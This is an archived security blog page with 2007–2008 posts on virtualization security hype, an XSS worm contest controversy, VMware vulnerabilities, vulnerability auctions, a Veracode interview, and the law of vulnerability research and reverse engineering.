PLEASE NOTE: I HAVE PERMANENTLY MOVED MY BLOG TO http://www.rationalsurvivability.com/blog

February 26, 2008

The virtualization security (VirtSec) FUD meter is in overdrive this week...

Part I: So, I was at a conference a couple of weeks ago. I sat in on a lot of talks. Some of them had demos. What amazed me about these demos is that in many cases, in order for the attacks to work, it was disclosed that the attack target was configured by a monkey with all defaults enabled and no security controls in place. "...of course, if you checked this one box, the exploit doesn't work..." *gulp*

Part II: We've observed a lot of interesting PoC attack demonstrations such as those at shows being picked up by the press and covered in blogs and such. Many of these stories simply ham it up for the sensational title. Some of the artistic license and innacuracies are just plain recockulous. That's right. There's ridiculous, then there's recockulous.

Example: Here's a by-line from an article which details the PoC attack/code that Jon Oberheide used to show how, if you don't follow VMware's (and the CIS benchmark) recommendations for securing your VMotion network, you might be susceptible to interception of traffic and bad things since -- as VMware clearly states -- VMotion traffic (and machine state) is sent in the clear.

This was demonstrated at BlackHat DC and here's how the article portrayed it:

Jon Oberheide, a researcher and PhD candidate at the
University of Michigan, is releasing a proof-of-concept tool called
Xensploit that lets an attacker take over the VM’s hypervisor and
applications, and grab sensitive data from the live VMs.

Really? Take over the hypervisor, eh? Hmmmm. That sounds super-serious! Oh, the humanity!

However, here's how the VMTN blog rationally describes the situation in a measured response that does it better than I could:

Recently a researcher published a proof-of-concept called
Xensploit which allows an attacker to view or manipulate a VM undergoing live
migration (i.e. VMware’s VMotion) from one server to
another. This was shown to work with
both VMware’s and Xen’s version of live migration. Although impressive, this work by no means
represents any new security risk in the datacenter. It should be emphasized this proof-of-concept
does NOT “take over the hypervisor” nor present
unencrypted traffic as a vulnerability needing patching, as some news
reports incorrectly assert. Rather, it a
reminder of how an already-compromised network, if left unchecked, could be
used to stage additional severe attacks in any environment, virtual or
physical. ...

Encryption of all data-in-transit is certainly one well-understood mitigation
for man-in-the-middle attacks. But the fact
that plenty of data flows unencrypted within the enterprise – indeed perhaps
the majority of data – suggests that there are other adequate mitigations. Unencrypted VMotion traffic is not a flaw,
but allowing VMotion to occur on a compromised network can be. So this is a good time to re-emphasize hardening best practices for VMware
Infrastructure and what benefit they serve in this scenario.

I'm going to give you one guess as to why this traffic is unencrypted...see if you can guess right in the comments.

Now, I will concede that this sort of thing represents a new risk in the datacenter if you happen to not pay attention to what you're doing, but I think Jon's PoC is a great example of substantiating why you should follow both common sense, security hardening recommendations and NOT BELIEVE EVERYTHING YOU READ.

The diminutive XSS worm replication contest
is a week long contest to get some good samples of the smallest amount
of code necessary for XSS worm propagation. I’m not interested in
payloads for this contest, but rather, the actual methods of
propagation themselves. We’ve seen the live worm code
and all of it is muddied by obfuscation, individual site issues, and
the payload itself. I’d rather think cleanly about the most efficient
method for propagation where every character matters.

yes, folks... robert hansen (aka rsnake), the founder and ceo of
sectheory, felt it would be a good idea to hold a contest to see who
could create the smallest xss worm...
ok, so there's no money changing hands this time, but that doesn't mean
the winner isn't getting rewarded - there are absolutely rewards to be
had for the winner of a contest like this and that's a big problem
because lots of people want rewards and this kind of contest will make
people think about and create xss worms when they wouldn't have
before...

Here's where Kurt diverges from simply highlighting nominal arguments of the potential for
misuse of the contest derivatives. He suggests that RSnake is being
unethical and is encouraging this contest not for academic purposes, but rather to reap personal gain from it:

would you trust your security to a person who makes or made malware?
how about a person or company that intentionally motivates others to do
so? why do you suppose the anti-virus industry works so hard to fight
the conspiracy theories that suggest they are the cause of the viruses?
at the very least mr. hansen is playing fast and loose with the publics
trust and ultimately harming security in the process, but there's a
more insidious angle too...

while the worms he's soliciting from others are supposed to be merely
proof of concept, the fact of the matter is that proof of concept worms
can still cause problems (the recent orkut worm
was a proof of concept)... moreover, although the winner of the contest
doesn't get any money, at the end of the day there will almost
certainly be a windfall for mr. hansen - after all, what do you suppose
happens when you're one of the few experts on some relatively obscure
type of threat and that threat is artificially made more popular? well,
demand for your services goes up of course... this is precisely the
type of shady marketing model i described before
where the people who stand to gain the most out of a problem becoming
worse directly contribute to that problem becoming worse... it made
greg hoglund and jamie butler household names in security circles, and
it made john mcafee (pariah though he may be) a millionaire...

I think the following exchange in the comments section of the contest forum offers an interesting position from RSnake's perspective:

@Gareth Heyes - perhaps, but trouble is my middle name. So is danger.
Actually I have like 40 middle names it turns out. ;) No, I'm not
worried, this is academic - it won't work anywhere without modification
of variables, and has no payload. The goal is to understand worm
propagation and get to the underlying important pieces of code.

I'm not in the UK and am not a lawyer so I can't comment on the
laws. I'm not suggesting anyone should try to weaponize the code (they
could already do that with the existing worm code if they wanted anyway).

So, we've got Wismer's perspective and (indirectly) RSnake's.

What's yours? Do you think holding a contest to build a POC for a worm a good idea? Do the benefits of research and understanding the potential attacks so one can defend against them outweigh the potential for malicious use? Do you think there are, or will be, legal ramifications from these sorts of activities?

September 21, 2007

By now you've no doubt heard that Ryan Smith and Neel Mehta from IBM/ISS X-Force have discovered vulnerabilities in VMware's DHCP implementation that could allow for "...specially crafted packets to gain system-level privileges" and allow an attacker to execute arbitrary code on the system with elevated privileges thereby gaining control of the system.

Further, Dark Reading details that Rafal Wojtczvk (whose last name's spelling is a vulnerability in and of itself!) from McAfee discovered the following vulnerability:

A vulnerability
that could allow a guest operating system user with administrative
privileges to cause memory corruption in a host process, and
potentially execute arbitrary code on the host. Another fix addresses a
denial-of-service vulnerability that could allow a guest operating
system to cause a host process to become unresponsive or crash.

...and yet another from the Goodfellas Security Research Team:

An additional update, according to the advisory, addresses a
security vulnerability that could allow a remote hacker to exploit the
library file IntraProcessLogging.dll to overwrite files in a system. It
also fixes a similar bug in the library file vielib.dll.

It is important to note that these vulnerabilities have been mitigated by VMWare at the time of this announcement. Further information regarding mitigation of all of these vulnerabilities can be found here.

You can find details regarding these vulnerabilities via the National Vulnerability Database here:

CVE-2007-4496 - Unspecified vulnerability in EMC
VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build
55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build
55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017,
and Server before 1.0.4 Build 56528 allows authenticated users with
administrative privileges on a guest operating system to corrupt memory
and possibly execute arbitrary code on the host operating system via
unspecified vectors.

CVE-2007-4155 - Absolute path traversal vulnerability in a certain ActiveX control in
vielib.dll in EMC VMware 6.0.0 allows remote attackers to execute
arbitrary local programs via a full pathname in the first two arguments
to the (1) CreateProcess or (2) CreateProcessEx method.

I am happy to see that VMware moved on these vulnerabilities (I do not have the timeframe of this disclosure and mitigation available.) I am convinced that their security team and product managers truly take this sort of thing seriously.

However, this just goes to show you that as the virtualization platforms enter further-highlighted mainstream adoption, exploitable vulnerabilities will continue to follow as those who follow the money begin to pick up the scent.

This is another phrase that's going to make a me a victim of my own Captain Obvious Award, but it seems like we've been fighting this premise for too long now. I recognize that this is not the first set of security vulnerabilities we've seen from VMware, but I'm going to highlight them for a reason.

It seems that due to a lack of well-articulated vulnerabilities that extended beyond theoretical assertions or POC's, the sensationalism of research such as Blue Pill has desensitized folks to the emerging realities of virtualization platform attack surfaces.

I've blogged about this over the last year and a half, with the latest found here and an interview here. It's really just an awareness campaign. One I'm more than willing to wage given the stakes. If that makes me the noisy canary in the coal mine, so be it.

These very real examples are why I feel it's ludicrous to take seriously any comments that suggest by generalization that virtualized environments are "more secure" by design; it's software, just like anything else, and it's going to be vulnerable.

I'm not trying to signal that the sky is falling, just the opposite. I do, however, want to make sure we bring these issues to your attention.

July 25, 2007

Listen, I'm a renaissance man and I look for analogs to the security space anywhere and everywhere I can find them.

I maintain that next to the iPhone, this is the biggest thing to hit the security world since David Maynor found Jesus (in a pool hall, no less.)

I believe InfoSec Sellout already has produced a zero-day for this using real worms. No Apple products were harmed during the production of this webserver, but I am sad to announce that there is no potential for adding your own apps to the KermitOS...an SDK is available, however.

The frog's dead. Suspended in a liquid. In a Jar. Connected to the network via an Ethernet cable. You can connect to the embedded webserver wired into its body parts. When you do this, you control which one of its legs twitch. pwned!

The Experiments in Galvanism frog floats in mineral oil, a webserver
installed it its guts, with wires into its muscle groups. You can
access the frog over the network and send it galvanic signals that get
it to kick its limbs.

Experiments in Galvanism is the culmination of studio and gallery
experiments in which a miniature computer is implanted into the dead
body of a frog specimen. Akin to Damien Hirst's bodies in formaldehyde,
the frog is suspended in clear liquid contained in a glass cube, with a
blue ethernet cable leading into its splayed abdomen. The computer
stores a website that enables users to trigger physical movement in the
corpse: the resulting movement can be seen in gallery, and through a
live streaming webcamera.
- Risa Horowitz

Garnet Hertz has implanted a miniature webserver in the body of a
frog specimen, which is suspended in a clear glass container of mineral
oil, an inert liquid that does not conduct electricity. The frog is
viewable on the Internet, and on the computer monitor across the room,
through a webcam placed on the wall of the gallery. Through an Ethernet
cable connected to the embedded webserver, remote viewers can trigger
movement in either the right or left leg of the frog, thereby updating
Luigi Galvani's original 1786 experiment causing the legs of a dead
frog to twitch simply by touching muscles and nerves with metal.

Experiments in Galvanism is both a reference to the origins of
electricity, one of the earliest new media, and, through Galvani's
discovery that bioelectric forces exist within living tissue, a nod to
what many theorists and practitioners consider to be the new new media:
bio(tech) art.
- Sarah Cook and Steve Dietz

Good, bad or indifferent, one would be blind not to recognize that these services are changing the landscape of vulnerability research and pushing the limits which define "responsible disclosure."

It was only a matter of time until we saw the mainstream commercial emergence of the open vulnerability auction which is just another play on the already contentious marketing efforts blurring the lines between responsible disclosure for purely "altruistic" reasons versus commercial gain.

This auction marketplace for vulnerabilities is marketed as a Swiss "...Laboratory & Marketplace Platform for Information Technology Security" which "...helps customers defend their databases, IT infrastructure, network, computers, applications, Internet offerings and access."

Despite a name which sounds like Mushmouth from Fat Albert created it (it's Japanese in origin, according to the website) I am intrigued by this concept and whether or not it will take off.

I am, however, a little unclear on how customers are able to purchase a vulnerability and then become more secure in defending their assets.

A vulnerability without an exploit, some might suggest, is not a vulnerability at all -- or at least it poses little temporal risk. This is a fundamental debate of the definition of a Zero-Day vulnerability.

Further, a vulnerability that has a corresponding exploit but without a countermeasure (patch, signature, etc.) is potentially just as useless to a customer if you have no way of protecting yourself.

If you can't manufacture a countermeasure, even if you hoard the vulnerability and/or exploit, how is that protection? I suggest it's just delaying the inevitable.

I am wondering how long until we see the corresponding auctioning off of the exploit and/or countermeasure? Perhaps by the same party that purchased the vulnerability in the first place?

Today in the closed loop subscription services offered by vendors who buy vulnerabilities, the subscribing customer gets the benefit of protection against a threat that they may not even know they have, but for those who can't or won't pony up the money for this sort of subscription (which is usually tied to owning a corresponding piece of hardware to enforce it,) there exists a point in time between when the vulnerability is published and when it this knowledge is made available universally.

Depending upon this delta, these services may be doing more harm than good to the greater populous.

In fact, Dave G. over at Matasano argues quite rightly that by publishing even the basic details of a vulnerability that "researchers" will be able to more efficiently locate the chunks of code wherein the vulnerability exists and release this information publicly -- code that was previously not known to even have a vulnerability.

Each of these example vulnerability service offerings describes how the vulnerabilities are kept away from the "bad guys" by qualifying their intentions based upon the ability to pay for access to the malicious code (we all know that criminals are poor, right?) Here's what the Malware Distribution Project describes as the gatekeeper function:

Why Pay?

Easy; it keeps most, if not all of the malicious intent, outside the
gates. While we understand that it may be frustrating to some people
with the right intentions not allowed access to MD:Pro, you have to
remember that there are a lot of people out there who want to get
access to malware for malicious purposes. You can't be responsible on
one hand, and give open access to everybody on the other, knowing that
there will be people with expressly malicious intentions in that group.

ZDI suggests that by not reselling the vulnerabilities but rather protecting their customers and ultimately releasing the code to other vendors, they are giving back:

The Zero Day Initiative (ZDI) is unique in how the acquired
vulnerability information is used. 3Com does not re-sell the
vulnerability details or any exploit code. Instead, upon notifying the
affected product vendor, 3Com provides its customers with zero day
protection through its intrusion prevention technology. Furthermore,
with the altruistic aim of helping to secure a broader user base, 3Com
later provides this vulnerability information confidentially to
security vendors (including competitors) who have a vulnerability
protection or mitigation product.

As if you haven't caught on yet, it's all about the Benjamins.

We've seen the arguments ensue regarding third party patching. I think that this segment will heat up because in many cases it's going to be the fastest route to protecting oneself from these rapidly emerging vulnerabilities you didn't know you had.

June 19, 2007

In this first installment of Take5, I interview Chris Wysopal, the CTO of Veracode about his new company, secure coding, vulnerability research and the recent forays into application security by IBM and HP.

This entire interview was actually piped over a point-to-point TCP/IP connection using command-line redirection through netcat. No packets were harmed during the making of this interview...

First, a little background on the victim, Chris Wysopal:

Chris Wysopal is
co-founder and CTO of Veracode. He has testified on Capitol Hill on the subjects of government
computer security and how vulnerabilities are discovered in software. Chris
co-authored the password auditing tool L0phtCrack, wrote the windows version of
netcat, and was a researcher at the security think tank, L0pht Heavy
Industries, which was acquired by @stake. He was VP of R&D at @stake
and later director of development at Symantec, where he led a
team developing binary static analysis technology.

He was influential in
the creation of responsible vulnerability disclosure guidelines and a founder of
the Organization for Internet Safety. Chris wrote "The Art of
Software Security Testing: Identifying Security Flaws", published by Addison
Wesley and Symantec Press in December 2006. He earned his Bachelor of Science
degree in Computer and Systems Engineering from Rensselaer Polytechnic
Institute.

1) You’re a founder of Veracode
which is described as the industry’s first providerof automated, on-demand
application security solutions. What sort of applicationsecurity
services does Veracode provide? Binary analysis, Web Apps?

Veracode currently offers binary static analysis of C/C++ applications
for Windows and Solaris and for Java applications. This allows us to find
the classes of vulnerabilities that source code analysis tools can find but on
the entire codebase including the libraries which you probably don't have source
code for. Our product roadmap includes support for C/C++ on Linux and C# on
.Net. We will also be adding additional analysis techniques to our
flagship binary static analysis.

2) Is this a SaaS model?
How do you charge for your services? Do you see
manufacturersusing your services or enterprises?

Yes.
Customers upload their binaries to us and we deliver an analysis of their
security flaws via our web portal. We charge by the megabyte of
code. We have both software vendors and enterprises who write or outsource
their own custom software using our services. We also have
enterprises who are purchasing software ask the software vendors to submit their
binaries to us for a 3rd party analysis. They use this analysis as a
factor in their purchasing decision. It can lead to a "go/no go" decision, a
promise by the vendor to remediate the issues found, or a reduction in price to
compensate for the cost of additional controls or the cost of incident
response that insecure software necessitates.

3) I was a Qualys customer
— a VA/VM SaaS company. Qualys had to spend quitea bit of time
convincing customers that allowing for the storage of their VA data
wassecure. How does Veracode address a customer’s security concerns when
uploading theirapplications?

We are
absolutely fanatical about the security of our customers data. I look back
at the days when I was a security consultant where we had vulnerability
data on laptops and corporate file shares and I say, "what were we
thinking?" All customer data at Veracode is encrypted in storage and at
rest with a unique key per application and customer. Everyone at Veracode
uses 2 factor authentication to log in and 2 factor is the default for
customers. Our data center is a SAS 70 Type II facility. All data
access is logged so we know exactly who looked at what and when. As security
people we are professionally paranoid and I think it shows through in the system
we built. We also believe in 3rd party verification so we have had a top
security boutique do a security review our portal
application.

4) With IBM’s acquisition
of Watchfire and today’s announcement that HP will buySPI Dynamics, how does
Veracode stand to play in this market of giants who willbe competing to
drive service revenues?

We
have designed our solution from the ground up to have the Web 2.0 ease of
use and experience and we have the quality of analysis that I feel is the best
in the market today. An advantage is Veracode is an independent
assessment company that customers can trust to not play favorites to other
software companies because of partnerships or alliances. Would Moody's or
Consumer Reports be trusted as a 3rd party if they were part of a big financial
or technology conglomerate? We feel a 3rd party assessment is important in the
security world.

5) Do you see the latest
developments in vulnerability research with the drive forpay-for-zeroday
initiatives pressuring developers to produce secure code out of the box for
fear of exploit or is it driving the activity to companies like yours?

I
think the real driver for developers to produce secure code and for developers
and customers to seek code assessments is the reality that the costs of insecure
code goes up everyday and its adding to the operational risk of companies that
use software. People exploiting vulnerabilities are not going away
and there is no way to police the internet of vulnerability
information. The only solution is for customers to demand more secure
code, and proof of it, and for developers to deliver more secure code in
response.

June 14, 2007

In May I blogged what I thought was an interesting question regarding the legality and liability of reverse engineering in security vulnerability research. That discussion focused on the reverse engineering and vulnerability research of hardware and software products that were performed locally.

I continued with a follow-on discussion and extended the topic to include security vulnerability research from the web-based perspective in which I was interested to see how different the opinions on the legality and liability were from many of the top security researchers as it relates to the local versus remote vulnerability research and disclosure perspectives.

As part of the last post, I made reference to a working group organized by CSI whose focus and charter were to discuss web security research law. This group is made up of some really smart people and I was looking forward to the conclusions reached by them on the topic and what might be done to potentially solve the obvious mounting problems associated with vulnerability research and disclosure.

Unfortunately, the conclusions of the working group is an inditement of the sad state of affairs related to the security space and further underscores the sense of utter hopelessness many in the security community experience.

What the group concluded after 14 extremely interesting and well-written pages was absolutely nothing:

The meeting of minds that took place over the past two months advanced the group's collective knowledge on the issue of Web security research law. Yet if one assumed that the discussion advanced the group's collective understanding of this issue, one might be mistaken.

Informative though the work was, it raised more questions than answers. In the pursuit of clarity, we found, instead, turbidity.

Thus it follows, that there are many opportunities for further thought, further discussion, further research and further stirring up of murky depths. In the short term, the working group has plans to pursue the following endeavors:

Creating disclosure policy guidelines -- both to help site owners write disclosure policies, and for security researchers to understand them.

Creating guidelines for creating a "dummy" site.

Creating a more complete matrix of Web vulnerability research methods, written with the purpose of helping attorneys, lawmakers and law enforcement officers understand the varying degrees of invasiveness

Jeremiah Grossman, a friend and one of the working group members summarized the report and concluded with the following: "...maybe within the next 3-5 years as more incidents like TJX occur, we’ll have both remedies." Swell.

Please don't misunderstand my cynical tone and disappointment as a reflection on any of the folks who participated in this working group -- many of whom I know and respect. It is, however, sadly another example of the hamster wheel of pain we're all on when the best and brightest we have can't draw meaningful conclusions against issues such as this.

I was really hoping we'd be further down the path towards getting our arms around the problem so we could present meaningful solutions that would make a dent in the space. Unfortunately, I think where we are is the collective shoulder shrug shrine of cynicism perched periously on the cliff overlooking the chasm of despair which drops off into the trough of disillusionment.

June 10, 2007

I posited the potential risks of vulnerability research in this blog entry here. Specifically I asked about reverse engineering and implications related to IP law/trademark/copyright, but the focus was ultimately on the liabilities of the researchers engaging in such activities.

Admittedly I'm not a lawyer and my understanding of some of the legal and ethical dynamics are amateur at best, but what was very interesting to me was the breadth of the replies from both the on and off-line responses to my request for opinion on the matter.

I was contacted by white, gray and blackhats regarding this meme and the results were divergent across legal, political and ideological lines.

KJH (Kelly Jackson Higgins -- hey, Kel!) from Dark Reading recently posted an interesting collateral piece titled "Laws Threaten Security Researchers" in which she outlines the results of a CSI working group chartered to investigate and explore the implications that existing and pending legislation would have on vulnerability research and those who conduct it. Folks like Jeremiah Grossman (who comments on this very story, here) and Billy Hoffman participate on this panel.

What is interesting is the contrast in commentary between how folks responded to my post versus these comments based upon the CSI working group's findings:

In the report, some Web researchers say that even if they
find a bug accidentally on a site, they are hesitant to disclose it to
the Website's owner for fear of prosecution. "This opinion grew
stronger the more they learned during dialogue with working group
members from the Department of Justice," the report says.

I believe we've all seen the results of some overly-litigious responses on behalf of companies against whom disclosures related to their products or services have been released -- for good or bad.

Ask someone like Dave Maynor if the pain is ultimately worth it. Depending upon your disposition, your mileage may vary.

That revelation is unnerving to Jeremiah Grossman, CTO and
founder of WhiteHat Security and a member of the working group. "That
means only people that are on the side of the consumer are being
silenced for fear of prosecution," and not the bad guys.

...

"[Web] researchers are terrified about what they can and
can't do, and whether they'll face jail or fines," says Sara Peters,
CSI editor and author of the report. "Having the perspective of legal
people and law enforcement has been incredibly valuable. [And] this is
more complicated than we thought."

This sort of response didn't come across that way at all from folks who both privately or publicly responded to my blog; most responses were just the opposite, stated with somewhat of a sense of entitlement and immunity. I expect to query those same folks again on the topic.

Check this out:

The report discusses several methods of Web research, such as
gathering information off-site about a Website or via social
engineering; testing for cross-site scripting by sending HTML mail from
the site to the researcher's own Webmail account; purposely causing
errors on the site; and conducting port scans and vulnerability scans.

Interestingly, DOJ representatives say that using just one of
these methods might not be enough for a solid case against a [good or
bad] hacker. It would take several of these activities, as well as
evidence that the researcher tried to "cover his tracks," they say. And
other factors -- such as whether the researcher discloses a
vulnerability, writes an exploit, or tries to sell the bug -- may
factor in as well, according to the report.

Full disclosure and to whom you disclose it and when could mean the difference between time in the spotlight or time in the pokey!

May 08, 2007

(Ed.: Wow, some really great comments came out of this question. I did a crappy job framing the query but there exists a cohesiveness to both the comments and private emails I have received that shows there is confusion in both terminology and execution of reverse engineering.

I suppose the entire issue of reverse engineering legality can just be washed away by what appeared to me as logical and I stated in the first place -- there is no implied violation of an EULA or IP if one didn't agree to it in the first place (duh!) but I wanted to make sure that my supposition was correct.]

I have a question that hopefully someone can answer for me in a straightforward manner. It popped into my mind yesterday in an unrelated matter and perhaps it's one of those obvious questions, but I'm not convinced I've ever seen an obvious answer.

If I as an individual or as a representative of a company that performs vulnerability research and assurance engages in reverse engineering of a product that is covered by patent/IP protection and/or EULA's that expressly forbids reverse engineering, how would I deflect liability for violating these tenets if I disclose that I have indeed engaged in reverse engineering?

HID and Cisco have both shown that when backed into a corner, they will litigate and the researcher and/or company is forced to either back down or defend (usually the former.)(Ed:. Poor examples as these do not really fall into the same camp as the example I give below.)

Do you folks who do this for a living (or own/manage a company that does) simply count on the understanding that if one can show "purity" of non-malicious motivation that nothing bad will occur?

It's painfully clear that the slippery slope of full-disclosure plays into this, but help me understand howthe principle of the act (finding vulnerability and telling the company/world about it) outweighs the liability involved.

Do people argue that if you don't purchase the equipment you're not covered under the EULA? I'm trying to rationalize this. How does one side-step the law in these cases without playing Russian Roulette?

Here's an example of what I mean. If you watch this video, the researchers that demonstrated theCisco NAC attack @ Black Hat clearly articulate the methods they used to reverse engineer Cisco's products.

I'm not looking for a debate on the up/downside of full disclosure, but
more specifically the mechanics of the process used to identify that a
vulnerability exists in the first place -- especially if reverse
engineering is used.

Perhaps this is a naive question or an uncomfortable one to answer, but I'm really interested.